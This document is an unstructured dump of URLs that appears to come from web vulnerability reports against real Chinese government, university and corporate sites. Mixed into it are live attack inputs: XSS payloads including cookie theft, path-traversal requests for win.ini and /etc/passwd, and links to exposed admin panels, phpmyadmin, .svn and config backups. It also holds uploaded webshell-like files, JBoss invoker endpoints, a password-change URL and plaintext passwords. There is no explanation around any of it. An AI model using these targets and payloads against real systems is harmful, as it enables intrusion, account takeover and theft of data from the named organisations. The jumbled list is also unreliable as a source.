http://www.henanrd.gov.cn/committee12.2/index.jsp?CId=428 http://112.80.248.138:8080/ http://112.80.248.138:8080/phpmyadmin/index.php http://192.168.2.99/detailbackhandler.php http://dg.uninx.com/dgpt/list.phpsearchword=&type=2&inpbrand=&inpguodaishang=4&inpjiage=&inpzhuping=&inpwangluolx=&inp4Gwangluo=&inp3Gwangluo=&inp2Gwangluo=&inpxitong=&inphexinshu=&inpshexiangtou=&inpSIMka=&inptedian= http://www.sjzszlxx.com/database/ password:20090904 http://www.sjzszlxx.com/ewebeditor/ http://www.sjzszlxx.com/ewebeditor/UploadFile/2015226131733143.asa http://**.**.**/cms/cms/webapp/research/research.zip http://shop.toone.com/index.php?a=index&g=Home&m=Product&product_type_id=3 http://218.21.240.34/admin/alluser/manager.php?unit=%CE%DA%BA%A3%CA%D0%B7%A2%B8%C4%CE%AF&class=%B5%A5%CE%BB%BC%F2%BD%E9&subclass=%D5%FE%CE%F1%B9%AB%BF%AA http://218.21.240.34/admin/alluser/manager.php?unit=%CE%DA%BA%A3%CA%D0%B7%A2%B8%C4%CE%AF&class=%B5%A5%CE%BB%BC%F2%BD%E9&subclass=%D5%FE%CE%F1%B9%AB%BF%AA http://218.21.240.34/admin/alluser/manager.php?unit=%CE%DA%BA%A3%CA%D0%B7%A2%B8%C4%CE%AF&class=%B5%A5%CE%BB%BC%F2%BD%E9&subclass=%D5%FE%CE%F1%B9%AB%BF%AA http://fgw.wuhai.gov.cn/bbs/?bbstype=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&id=10198 http://fgw.wuhai.gov.cn/readnews.php?subclass=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://kefu.9you.com/ http://kftools.9you.com/ http://idea.9you.com/ http://ekey.9you.com/ http://yjdq.9you.com/ http://02jam.9you.com/ http://9you.com/ http://albumupload.9you.com/ http://au.hk.9you.com/ http://au2.9you.com/ http://audition.9you.com/ http://avatar.9you.com/ http://baf.9you.com/ http://bbs3.9you.com/ http://bbs5.9you.com/ http://bbs6.9you.com/ http://clock.9you.com/ http://ddr.9you.com/ http://dnh.9you.com/ http://editnews.hk.9you.com/ http://game.9you.com/ http://gt.9you.com/ http://hk.9you.com/ http://jb.9you.com/ http://idea.9you.com/ http://kx.9you.com/ http://lh.9you.com/ http://albumupload.9you.com/beautyalbum.php?curpid=22的反射xss,curpid过滤了单双引号。用HTML 
http://58.254.18.2:8080/manager/html http://cs.sina.com.hk http://cs.sina.com.hk/faq/sinahelp414.html http://221.1.104.11:8011/ExtWebModels/WebFront/ShowProject.aspx?id= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowProject.aspx?id= http://demo.inongyou.cn/ExtWebModels/WebFront/ShowProject.aspx?id= http://rctdlz.cn/ExtWebModels/WebFront/ShowProject.aspx?id= http://60.2.214.118:8088/ExtWebModels/WebFront/ShowProject.aspx?id= http://121.17.2.52/ExtWebModels/WebFront/ShowProject.aspx?id= http://61.186.154.210:8088/ExtWebModels/WebFront/ShowProject.aspx?id= http://member.ibicn.com/ http://www.wcfy.gov.cn/scjg/manage_login.asp http://www.ycyx.gov.cn/scjg/manage_login.asp http://www.gyjjjyzx.com/scjg/manage_login.asp http://www.lzquansheng.com/scjg/Admin_Index.asp http://www.scsdds.com/scjg/Manage_Login.asp http://www.pxjgj.com/scjg/Manage_Login.asp http://www.ntgh.gov.cn/dz/list.aspx?ks=b2_1 http://salon.hexun.com/BroadCast/admin/BroadCastList.aspx?activity=1 http://ffp.scal.com.cn/FFPNewWeb/Mileage/FlightRedeemRuleQuery http://ffp.scal.com.cn/FFPNewWeb/Mileage/QueryFlightRedeemRule http://ffp.scal.com.cn/FFPNewWeb/Mileage/FlightRedeemRuleQuery http://www.zblogcn.com/zblogphp/ http://218.29.79.78/recruit/school/schoollist.aspx?zone=200810291356051771156000 http://218.29.79.78/recruit/policy/default.aspx?type=1&page=1 http://218.29.79.78/recruit/school/schoollist.aspx?page=1&zone=200810291356051771156000 http://218.29.79.78/senior/policy/?type=01 http://218.29.79.78/recruit/policy/?type=1 http://218.29.79.78/senior/policy/default.aspx?type=01 http://www.wooyun.org/bugs/wooyun-2015-097271/trace/75422c0616bb8a959bd6583893ee0136 http://s.cnpc.com.cn http://s.cnpc.com.cn/index.php?app=blog&mod=Personal&act=post&blog_id=685&edit=1 http://s.cnpc.com.cn/index.php?app=blog&mod=Personal&act=post http://wooyun.org/bugs/wooyun-2014-076556 http://bbs.ubox.cn/index.php http://food.sc.sina.com.cn/ codehttps://219.143.209.76/ site:news.jlu.edu.cn 
http://news.jlu.edu.cn/new/?mod=admin&act=mend&menu=zt&id=31 http://news.jlu.edu.cn/new/2010_files/upload/zt20150226150702.php http://www.smmzj.gov.cn/Article_Search.aspx?KeyWord=1&pageNow=1 http://www.smmzj.gov.cn/smmzj008/htmledit/admin/default.asp http://de.appchina.com ttp://de.appchina.com/wp-config.php.bak http://www.jpi.cn/show.php?id=182&channel=2&class=30 http://www.jpi.cn/show.php?id=182&channel=2&class=30 http://www.donghaifunds.com/ http://180.166.204.253:8080/index.php/ http://data.xiezilou.com(http://bj.office.sina.com.cn) http://data.xiezilou.com/index.php/?c=building&a=postScore& http://vdian.vip.58.com/info/delete/要删除的IDccateId http://vdian.vip.58.com/info/delete/21113736622083 http://vdian.vip.58.com/info/post http://125.93.53.82:9988/login.html http://125.93.53.82:9988/login.html http://www.itoone.com/ http://www.datacarrier.cn/ www.cqnagt.gov.cn/www.rar http://support.m41s.com http://cs.m41s.com http://data.m41s.com http://cx.zjzs.net/exam/XYKS201501/ http://cx.zjzs.net/exam/MSZYCJ2015 http://chl.yinxunpay.com/login.action http://wooyun.org/bugs/wooyun-2015-090961 http://chl.fjwysw.com/login.action http://info.tclcomm.com/ http://info.tclcomm.com/email_download.asp?id=1 http://info.tclcomm.com/email_download.asp?id=3 https://121.201.96.96/.svn/entries https://122.13.147.96/.svn/entries http://183.56.157.202:8088/phpinfo.php http://w4.m41s.com/upgrade.php http://w5.m41s.com/index.php http://w4.m41s.com/index.php http://w3.m41s.com/index.php http://w2.m41s.com/index.php http://w.m41s.com/index.php http://support.m41s.com http://cs.m41s.com http://data.m41s.com http://**.**.**/Login.aspx www.yingtanfdc.com/default.aspx?tname=59\NewsText&hrefld=4565&ptCode=21 http://lsp.baidu.com/actions/virtual_location/script/sceneCreate.php http://m.aili.com/setting/feedback/ http://**.**.**/back/Cjy_login.do https://pay.suning.com/epp-epw/useraccount/compatible-login!toSuning.action?targetUrl=http://www.qq.com http://job.csdn.net/ 
http://biz.csdn.net/job/CreateJob?jobid=82707&?type=save http://pr.csdn.net/enterprise/ent_home?orgid=435363 http://vps.myxinnet.com/html/Login.aspx http://bbs.pigai.org/ http://biz.csdn.net/ http://biz.csdn.net/resume/index?csdnusername=***************&jobcvid=201532 http://job.csdn.net/Public/GetFile?FileID=2337 http://www.ykmzj.gov.cn/news.php?sid=12 http://zm.lenovo.com/launcher/profile.php?themeid=33799&version=4 http://zm.lenovo.com/launcher/data/attachment/theme/imgsrc/1425056661/example/testing.php http://www.skyexam.com/MemberQualificationManage/StudentModify.aspx?PK=121115000007043 http://ffp.scal.com.cn/FFPNewWeb/Mileage/SegmentMilesQuery http://ffp.scal.com.cn/FFPNewWeb/Mileage/QuerySegmentMiles http://ffp.scal.com.cn/FFPNewWeb/Mileage/SegmentMilesQuery http://paojiao.com/user/search.html?userName=s kingdomdeMacBook-Pro:sqlmap-dev http://api.himoca.com/moca/System/Info http://sqlmap.org http://www.aaisme.com,点首页的登录处的找回密码。这里以admin为例。 http://124.133.3.232:8080/Login.aspx https://next.sfn.cn/ https://admin.sfn.cn kingdomdeMacBook-Pro:sqlmap-dev http://m.himoca.com/about2.asp?id=3 http://sqlmap.org http://www.slswsj.com http://www.slswsj.com/xwxx.asp?maxid=6&actionid=480 http://wenku.baidu.com/view/e4bc0882dd3383c4ba4cd20e.html https://202.127.1.85 http://wenku.baidu.com/view/a0c5eac98bd63186bcebbc08.html https://159.226.132.3 http://219.138.244.246:8080/ http://113.59.33.166:8080/ http://123.127.75.182:8080/ http://113.214.20.148:8080/ http://183.129.232.103:8080/ http://219.138.141.252:8080/ http://42.202.133.35:8080/ http://116.228.81.22:8080/ http://112.14.188.94:8080/ http://112.113.97.245:8080/ http://218.205.123.2:8080/ http://183.246.161.141:8080/ http://123.127.75.181:8080/ http://120.199.1.154:8080/ http://219.237.9.201:8080/ http://115.29.170.138:8080/ http://59.50.104.92:8080/ http://218.205.127.17:8080/ http://120.197.66.230:8080/ http://111.1.2.83:8080/ http://218.202.46.58:8080/ http://113.98.52.221:8080/ http://119.80.113.3:8080/ 
http://117.27.88.5:8080/ http://222.132.83.246:8080/ http://111.1.2.82:8080/ http://218.21.69.20:8080/ http://117.40.91.101:8080/ http://219.232.86.3:8080/ http://119.7.222.196:8080/ http://221.10.132.186:8080/ http://125.65.207.34:8080/ http://218.24.45.204:8080/ http://221.2.40.236:8080/ http://58.42.241.49:8080/ http://183.221.242.39:8080/ http://111.1.2.84:8080/ http://222.38.248.60:8080/ http://122.226.29.142:8080/ http://218.89.39.199:8080/ http://61.164.202.218:8080/ http://110.249.221.236/CWDoc/Login/LogOn http://bkjyw.swu.edu.cn/ http://bkjyw.swu.edu.cn/index.php/employ/listemp.html?selectedcate=6 password:baoguang2012/jackson2012/ http://www.ctflife.com/platinum/platinum/ http:/// http://cx.zjzs.net/exam/SSYJS2015/ http://210.43.126.80:8080/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://218.75.27.177/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://101.76.99.20/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://211.64.205.214/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://202.203.225.17:8080/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://61.187.179.68:8080/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://210.43.126.80:8080/Gmis/pygl/sjhd.aspx?xh=07102822061 http://218.75.27.177/Gmis/pygl/sjhd.aspx?xh=07102822061 http://101.76.99.20/Gmis/pygl/sjhd.aspx?xh=07102822061 http://202.203.225.17:8080/Gmis/pygl/sjhd.aspx?xh=07102822061 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/sjhd.aspx?xh=07102822061 http://61.187.179.68:8080/Gmis/pygl/sjhd.aspx?xh=07102822061 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/sjhd.aspx?xh=07102822061 http://210.43.126.80:8080/Gmis/pygl/shsjsh_ds.aspx?xh=1 http://218.75.27.177/Gmis/pygl/sjhd.aspx?xh=07102822061 http://www1.53kf.com/impl/rpc_company_info_minkh.php http://www2.53kf.com/impl/rpc_company_info_minkh.php http://www3.53kf.com/impl/rpc_company_info_minkh.php http://www6.53kf.com/impl/rpc_company_info_minkh.php http://www7.53kf.com/impl/rpc_company_info_minkh.php 
http://www8.53kf.com/impl/rpc_company_info_minkh.php http://www9.53kf.com/impl/rpc_company_info_minkh.php http://www10.53kf.com/impl/rpc_company_info_minkh.php http://www11.53kf.com/impl/rpc_company_info_minkh.php http://www12.53kf.com/impl/rpc_company_info_minkh.php http://www13.53kf.com/impl/rpc_company_info_minkh.php http://www15.53kf.com/impl/rpc_company_info_minkh.php http://www16.53kf.com/impl/rpc_company_info_minkh.php http://www17.53kf.com/impl/rpc_company_info_minkh.php http://www22.53kf.com/impl/rpc_company_info_minkh.php http://www28.53kf.com/impl/rpc_company_info_minkh.php http://www29.53kf.com/impl/rpc_company_info_minkh.php http://www30.53kf.com/impl/rpc_company_info_minkh.php http://www33.53kf.com/impl/rpc_company_info_minkh.php http://www36.53kf.com/impl/rpc_company_info_minkh.php http://www40.53kf.com/impl/rpc_company_info_minkh.php http://www41.53kf.com/impl/rpc_company_info_minkh.php http://www42.53kf.com/impl/rpc_company_info_minkh.php http://www43.53kf.com/impl/rpc_company_info_minkh.php http://www44.53kf.com/impl/rpc_company_info_minkh.php http://www45.53kf.com/impl/rpc_company_info_minkh.php http://www.seetong.com/ http://202.201.7.35/web/template/web-index.action inurl:/download/download.jsp?filename= www.bd-bank.com.cn/download/download.jsp?filename=1361956542714.txt&filepath=../../../../../../../../../../windows/win.ini http://www.yxccb.com.cn/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini&filename=1363166087810.xml www.chinaprint.org/download/download.jsp?filename=1361956542714.txt&filepath=../../../../../../../../../../windows/win.ini www.buptpress.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini&filename=1363166087810.xml http://www.wondersoft.cn http://183.62.35.210:8081/gzdtss/Portal.aspx http://183.62.35.210:8081/gzdtss/SCSEXEC/IndexMainPageTab.aspx http://rentcar.7daysinn.cn:3668 http://www.dtzfw.gov.cn/bianjiqi/up/db.cer http://club.v2.net.cn/masterteam/show.php?id=10 
http://club.591hx.com http://club.591hx.com/?username=nsfocus http://dzjj.dz169.net http://dzjj.dz169.net/downAction.action?fileName=..%2f...%2f..%2f.%2f..%2f...%2f..%2f.%2f..%2f...%2f..%2f.%2f..%2f...%2f..%2f.%2f..%2f...%2f..%2f.%2f..%2f...%2f..%2f.%2fetc%2fpasswd存在xss: http://www.aaisme.com//index.php?a=topicInfo&c=school&page=232&topic_id=300 http://www.aaisme.com/index.php?c=school&a=topicInfo&page=1&type=indeX http://www.aaisme.com/mmc.php http://mp3.sogou.com/tiny/song?tid=82b855dc95e1be56&query=%C3%CE%CF%EB%C6%F0%BA%BD&song_name=%C3%CE%CF%EB%C6%F0%BA%BD&album_name=Heart%C3%CE+%B3%F6%B7%A2&singer_name=TFBOYS&play http://y.qq.com/webplayer/player.html http://mp3.sogou.com/tiny/song?tid=82b855dc95e1be56&query=%C3%CE%CF%EB%C6%F0%BA%BD&song_name=1&album_name=Heart%C3%CE+%B3%F6%B7%A2&singer_name=TFBOYS&play=http%3A%2F%2Fcc.stream.qqmusic.qq.com%2FC1000044WSp92MU5AU.m4a%3Ffromtag%3D52 http://mp3.sogou.com/tiny/song?tid=82b855dc95e1be56&query=%C3%CE%CF%EB%C6%F0%BA%BD&song_name=1&album_name=Heart%C3%CE+%B3%F6%B7%A2&singer_name=TFBOYS&play=%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C http://mp3.sogou.com/tiny/song?tid=82b855dc95e1be56&query=%C3%CE%CF%EB%C6%F0%BA%BD&song_name=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&album_name=Heart%C3%CE+%B3%F6%B7%A2&singer_name=TFBOYS&play=%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C http://mp3.sogou.com/tiny/song?tid=82b855dc95e1be56&query=%C3%CE%CF%EB%C6%F0%BA%BD&song_name=1&album_name=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&singer_name=TFBOYS&play=%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C http://114.251.172.108/default.asp http://me.aaisme.com//index.php/user/updatepassword?uid=8237642&newpass=123456789 user.php/photo/index?uid=27940599 www.ccu.edu.tw的分站 http://secretar.ccu.edu.tw/secretar_web/mw/news_content.php?nid=39 
http://inoffice.ccu.edu.tw/elitist/elitist_show.php?Elististsubcat_ID=12 http://erp.suning.com.cn/ URL:http://erp.suning.com.cn/epp/detail/publishinfodetail.jsp?pk_message=1003271000000001TMW3&infoTypeName=%D5%D0%B1%EA%D0%C5%CF%A2%B7%A2%B2%BC http://zyxw.dlmu.edu.cn:8080/ZYXWMPA/login/login_logout.do http://mxcms.moxian.com/ http://mxcms.moxian.com/index.php?m=admin&c=index&a=login http://www.npxzfw.gov.cn/www2/twopage/commonlists.jsp?punid= http://www.npxzfw.gov.cn/www2/twopage/commoncharging.jsp?deptUnid=965848141C14AF145670392654DDDABB http://www.npxzfw.gov.cn/www2/userpanel/myInfo_dept_list.jsp?deptunid=8E3909F18E9325C20161BFF0A6CB3F73 http://www.thermos.com.cn/product.php?curr_page=product_detail&id=157 http://www.thermos.com.cn/admin/privilege.php http://www.douguo.com http://ot.wap.sogou.com/web/admin/admin.jsp http://210.43.126.80:8080/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://218.75.27.177/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://101.76.99.20/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://211.64.205.214/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://202.203.225.17:8080/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://61.187.179.68:8080/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://210.43.126.80:8080/Gmis/dtjygl/dzbadd.aspx?id=1 http://218.75.27.177/Gmis/dtjygl/dzbadd.aspx?id=1 http://101.76.99.20/Gmis/dtjygl/dzbadd.aspx?id=1 http://211.64.205.214/Gmis/dtjygl/dzbadd.aspx?id=1 http://202.203.225.17:8080/Gmis/dtjygl/dzbadd.aspx?id=1 http://yjsy.wmu.edu.cn:8080/Gmis/dtjygl/dzbadd.aspx?id=1 http://61.187.179.68:8080/Gmis/dtjygl/dzbadd.aspx?id=1 http://yjsy.wzmc.edu.cn:8080/Gmis/dtjygl/dzbadd.aspx?id=1 http://101.76.99.20/Gmis/pygl/cjxshdlist.aspx?xh=200902100005 http://202.203.225.17:8080/Gmis/dtjygl/dzbadd.aspx?id=1 http://gongan.sdkd.net.cn/ 
http://210.43.126.80:8080/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://202.203.225.17:8080/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://218.75.27.177/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://yjsy.wmu.edu.cn:8080/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://101.76.99.20/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://61.187.179.68:8080/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://yjsy.wzmc.edu.cn:8080/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://211.64.205.214/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://210.43.126.80:8080/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://202.203.225.17:8080/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://218.75.27.177/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://101.76.99.20/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://61.187.179.68:8080/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://211.64.205.214/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://210.43.126.80:8080/Gmis/cjgl/zqsxsh.aspx?xh=200902100005 http://61.187.179.68:8080/Gmis/Byyxwgl/bydbjgcxmx.aspx?id=1 http://www.kjc.sdnu.edu.cn:80/qiantai/twopagetwo.aspx?InforId=9b1a5c45-118b-4a21-87e0-b0c31bff16b4 http://news.7k7k.com/gf/ http://wm.baidu.com","src":"","type":2,"title":"","isUpload":"0","imgWidth":"960","imgHeight":"60","imgUrl":"http://cpro.baidu.com/cpro/ui/preview/default_img_unit/fix/960x60.jpg","image":[10009,10007,10010,10013,10006,10015,10014],"tip":0,"linkUrl":"http://wm.baidu.com","imgTitle":"","des1":"","des2 www.imooc.com http://tushu.tzjyxx.gov.cn/ http://124.133.235.142/mobile/m_login.aspx http://paojiao.com/pages/user/private_msg_send.jsp?receiverId=10&niceName=ahswf&avatar= http://scm.tmt.tcl.com:8080/tclscm/login.action http://scm.tmt.tcl.com:8080/tclscm/cmd.jsp http://www.jxdcw.com/ajax/2011/gethouselist.ashx?callback=jsonp1421141529088&key=a http://www.snnu.edu.cn/ http://211.snnu.edu.cn/htdocs.rar http://alu.snnu.edu.cn/htdocs.rar http://ef-al.snnu.edu.cn/htdocs.rar 
http://www.snnu.edu.cn/snnu.tar.gz http://alu.snnu.edu.cn/htdocs.rar http://1.93.0.215:7001/drpengcloudportal/newui/jsp/workspaceConsole.jsp# http://210.43.126.80:8080/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://218.75.27.177/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://101.76.99.20/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://211.64.205.214/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://202.203.225.17:8080/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://61.187.179.68:8080/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://210.43.126.80:8080/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://218.75.27.177/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://101.76.99.20/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://211.64.205.214/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://202.203.225.17:8080/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://61.187.179.68:8080/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/sjhdlist_ds.aspx?xh=1 http://61.187.179.68:8080/Gmis/pygl/wxydbgsh_ds.aspx?xh=1 http://weixin.zjol.com.cn/weixin/pages/ZjolMembers/list.do http://210.43.126.80:8080/Gmis/pygl/wxydbgsh.aspx?xh=1 http://218.75.27.177/Gmis/pygl/wxydbgsh.aspx?xh=1 http://101.76.99.20/Gmis/pygl/wxydbgsh.aspx?xh=1 http://211.64.205.214/Gmis/pygl/wxydbgsh.aspx?xh=1 http://202.203.225.17:8080/Gmis/pygl/wxydbgsh.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/wxydbgsh.aspx?xh=1 http://61.187.179.68:8080/Gmis/pygl/wxydbgsh.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/wxydbgsh.aspx?xh=1 http://210.43.126.80:8080/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://218.75.27.177/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://101.76.99.20/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://211.64.205.214/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://202.203.225.17:8080/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/xsbgsh_ds.aspx?xh=1 
http://61.187.179.68:8080/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://101.76.99.20/Gmis/pygl/wxydbgsh.aspx?xh=1 http://211.64.205.214/Gmis/pygl/xsbgsh_ds.aspx?xh=1 http://www.mobline.cn/toIndex.action http://210.43.126.80:8080/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://218.75.27.177/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://101.76.99.20/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://211.64.205.214/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://202.203.225.17:8080/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://61.187.179.68:8080/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://210.43.126.80:8080/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://218.75.27.177/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://101.76.99.20/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://211.64.205.214/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://202.203.225.17:8080/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://yjsy.wmu.edu.cn:8080/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://61.187.179.68:8080/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://yjsy.wzmc.edu.cn:8080/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://218.75.27.177/Gmis/pygl/kcxxwh_jsedit.aspx?kcbh=1201132 http://211.64.205.214/Gmis/pygl/jxsjsh_ds.aspx?xh=200902100005 http://ir.xmyuzhou.com.cn/s/photo.php?id=3 http://tj.cndr.gov.cn/registry.action http://gs.njfu.edu.cn/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://202.203.225.17:8080/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://218.75.27.177/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://101.76.99.20/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://61.187.179.68:8080/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://210.43.126.80:8080/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 
http://211.64.205.214/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://210.43.126.80:8080/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://202.203.225.17:8080/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://218.75.27.177/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://101.76.99.20/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://61.187.179.68:8080/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://211.64.205.214/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 http://202.203.225.17:8080/Gmis/Byyxwgl/dbwyhwh.aspx?id=1 http://101.76.99.20/Gmis/Byyxwgl/xls_lwdbxxedit.aspx?id=200902100005 https://zxsl.gov.cn/ https://lyfx.gov.cn/ http://www.jzrongda.com/ http://ww.jzyfmhj.com/www.hnstz.com/wyyp.php?zhiweiid=1 http://www.jz-feihong.com/wyyp.php?zhiweiid=1 http://www.china-wheel.com.cn/wyyp.php?zhiweiid=3 http://www.miaozihao.com/wyyp.php?zhiweiid=36 http://www.jzjgjt.com/wyyp.php?zhiweiid=40 http://test.jzrongda.com/www.jinshanzhiye.com/wyyp.php?zhiweiid=49 http://www.jinghua-food.com/wyyp.php?zhiweiid=3 http://www.hnycdq.com/wyyp.php?zhiweiid=3 http://www.rongtaijm.com/wyyp.php?zhiweiid=1 http://w.hntgglc.com/www.hdlfm.com/wyyp.php?zhiweiid=2 http://www.qyhuangfu.com/wyyp.php?zhiweiid=2 http://ww.hntgglc.com/rtjm/wyyp.php?zhiweiid=1 http://www.hnstz.com/wyyp.php?zhiweiid=1 http://www.jhyjx.com/wyyp.php?zhiweiid=1 http://www.rongtaijieneng.com.cn/wyyp.php?zhiweiid=1 http://4.36009.ygspgs.com/rtjm/wyyp.php?zhiweiid=1 http://www.jznem.com/wyyp.php?zhiweiid=1 http://114.112.173.212:8080/invoker/EJBInvokerServlet http://114.112.173.212:8080/invoker/JMXInvokerServlet http://114.112.173.211:8080/invoker/EJBInvokerServlet http://114.112.173.211:8080/invoker/JMXInvokerServlet http://114.112.173.212:8080/invoker/JMXInvokerServlet system:service=MainDeployer http://www.cmuying.com/about/job.war 
https://218.76.215.70/ http://210.45.215.10 http://120.33.31.10:8085/wwmis/wzgs/eda.wags.globalAction.search.action?title= http://m.suning.com.cn/login.do http://tmtoa.tcl.com/hrmng/SearchShowFrame.nsf http://www.ftms.com.cn/information/news_detail.php?id=82漏洞页面 http://218.66.111.194/usr!login.action http://www.sxsrf.gov.cn/help/add.aspx http://www.sxsrf.gov.cn/1.asp http://www.sxsrf.gov.cn/userfiles/511864473244/2013.asp http://www.sxsrf.gov.cn/configuration/system/selectuserpic.aspx?FileType=user_pic http://www.sxsrf.gov.cn/configuration/system/selectuserpic.aspx?FileType=user_pic http://222.216.226.75:9068/userLogin.action,如图所示,来到了系统管理登陆界面 http://wooyun.g.178.com/main.php?act=album&action=edit&album_id=43730 http://www.ao.fudan.edu.cn/fudan/studentLogin!index.action http://www.1hai.cn/storeguide.aspx http://218.106.133.136/ChangePWD.aspx?account= http://218.106.133.136 http://bwch.hnu.cn/index!toIndex.action http://jhsbgf.com/index.action http://nandu.media.baidu.com/ http://nandu.media.baidu.com 